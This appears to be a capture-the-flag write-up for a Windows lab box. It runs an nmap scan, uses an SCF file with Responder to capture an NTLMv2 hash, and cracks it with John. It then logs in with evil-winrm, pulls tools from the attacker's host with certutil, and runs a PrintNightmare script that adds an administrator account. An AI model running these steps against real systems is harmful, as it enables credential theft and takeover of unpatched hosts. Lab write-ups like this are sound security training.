──(root💀kali)-[/home/chris] └─# nmap -sVC 10.10.10.100 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-19 07:39 CET…
nmap -sVC 10.10.11.106 -Pn Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-01 11:06 CET Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 0.00% done Nmap scan report for 10.10.11.106 Host is up (0.12s latency). Not shown: 997 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Site doesn't have a title (text/html; charset=UTF-8). |_http-server-header: Microsoft-IIS/10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2022-02-01T17:07:00 |_ start_date: 2022-02-01T17:05:18 |_clock-skew: mean: 6h59m57s, deviation: 0s, median: 6h59m57s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 62.82 seconds
File Uploading is working with a lot of Filetypes but there were no possiblity to execute/open the file.
a little bit later and a lot of googling i found the a way with SCF (https://sql–injection.blogspot.com/p/smb.html)
creating a SCF File and upload it to the Server, before you press Submit be sure that the responder is running and is capturing the NTLMv2 hash.
[Shell] Command=2 IconFile=\\10.10.16.4\share\test.ico [Taskbar] Command=ToggleDesktop
responder --lm -v -I tun0
now we have a NTLMv2 Hash and a username now we can go and crack the hash.
john --wordlist=/home/chris/Desktop/rockyou.txt hash.txt
and now we have a user to login with evil-winrm and get the user flag on the desktop. Transfer winPEASx86 to the Target and execute.
evil-winrm -i 10.10.11.106 -P 5985 -u tony -p liltony
certutil.exe -urlcache -split -f "http://10.10.16.4/winPEASx86.exe
after going thru all findings from winpeas, i found out that the spoolsvc is running and the name DRIVER was a little hint for me.
so i gave it a try (https://github.com/gyaansastra/Print-Nightmare-LPE) Copy the ps1 to the server. i most certainly use certutil. script execution is disabled but can easily be enabled with our user.
certutil.exe -urlcache -split -f "http://10.10.16.4/CVE-2021-1675.ps1 File C:\Users\tony\Desktop\test\CVE-2021-1675.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
*Evil-WinRM* PS C:\Users\tony\Desktop\test> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted -Force;
*Evil-WinRM* PS C:\Users\tony\Desktop\test> Import-Module .\CVE-2021-1675.ps1 *Evil-WinRM* PS C:\Users\tony\Desktop\test> Invoke-Nightmare -NewUser "john" -NewPassword "SuperSecure" [+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll [+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll" [+] added user john as local administrator [+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll *Evil-WinRM* PS C:\Users\tony\Desktop\test>
Easy to Create a NEW Admin User, now we have to connect again with the evil-winrm and can get the root flag.
evil-winrm -i 10.10.11.106 -p 5985 -u john -p SuperSecure